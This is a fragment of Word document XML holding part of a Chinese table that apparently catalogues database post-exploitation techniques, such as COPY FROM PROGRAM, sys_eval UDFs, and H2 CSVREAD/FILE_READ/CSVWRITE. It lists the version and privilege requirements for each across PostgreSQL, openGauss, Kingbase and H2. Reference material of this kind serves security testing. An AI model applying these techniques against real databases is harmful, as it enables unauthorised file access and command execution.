          </w:tcPr>
          <w:p w14:paraId="7BC827AA"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="077E5E66">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>命令执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="21296E6C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>COPY FROM PROGRAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="7342F9D2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="5B67ADE2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>9.3+；superuser 或 pg_execute_server_program</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="2F8867D8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="54650898"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
          </w:tcPr>
          <w:p w14:paraId="4418AF1E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>命令执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="1E084680">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>UDF sys_eval（lib_postgresqludf_sys）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
          </w:tcPr>
          <w:p w14:paraId="52F492B4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="3FC01B42">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>8.2~9.4；superuser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
          </w:tcPr>
          <w:p w14:paraId="6E78E3C2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="32BF44EE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>openGauss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="105C3142">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件读取</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="1E704B02">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>COPY FROM（兼容 PG 语法）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="002A9FCE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="420852C6">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>superuser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="2BCE3B86">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="34D2BCDE"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
          </w:tcPr>
          <w:p w14:paraId="5574F17E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件写入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="697356D4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>COPY TO（兼容 PG 语法）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
          </w:tcPr>
          <w:p w14:paraId="50CBB7A6">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="3D82108E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>superuser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
          </w:tcPr>
          <w:p w14:paraId="77CDB6F8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="50928C1A"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="5B25E634">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>命令执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="4F9D1C6E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>不支持</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="473E45F2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="7816C35E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>已移除 COPY FROM PROGRAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="67FF6A8A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="40A41836">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Kingbase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
          </w:tcPr>
          <w:p w14:paraId="6D95678C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件读取</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="1BFEA752">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>COPY FROM（复用 PG 通道）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
          </w:tcPr>
          <w:p w14:paraId="41A29EB0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="3B742332">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>superuser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
          </w:tcPr>
          <w:p w14:paraId="4A4F51A8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="770FDA64"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="1165B966">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件写入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="6730C22C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>COPY TO（复用 PG 通道）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="5E4A1C9C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="65F89B04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>superuser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="13E54294">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="2AC62CD2"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
          </w:tcPr>
          <w:p w14:paraId="4505A6D2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>命令执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="54975ADE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>COPY FROM PROGRAM（复用 PG 通道）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
          </w:tcPr>
          <w:p w14:paraId="150AE4E8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="7F33E0EA">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>superuser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
          </w:tcPr>
          <w:p w14:paraId="055E462A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="3EBA59D2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>H2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="3BC32AE0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件读取</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="739860B8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CSVREAD（char 链免引号）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="28A95ED4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>全通道</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="1D03DED2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>读写的是应用服务器本地文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="5E84336A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="51633D78"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
          </w:tcPr>
          <w:p w14:paraId="4B2F17EA">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件读取</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="7F39B916">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>FILE_READ + RAWTOHEX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
          </w:tcPr>
          <w:p w14:paraId="1E057B42">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>全通道</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="6202F6A8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>admin 权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
          </w:tcPr>
          <w:p w14:paraId="1382FAF0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="3B4FDE94"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="50E7B034">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件写入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="0476695E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CSVWRITE（裸字节落盘，仅末尾多一个 CRLF）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="556C92D4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>全通道</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="17B03488">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
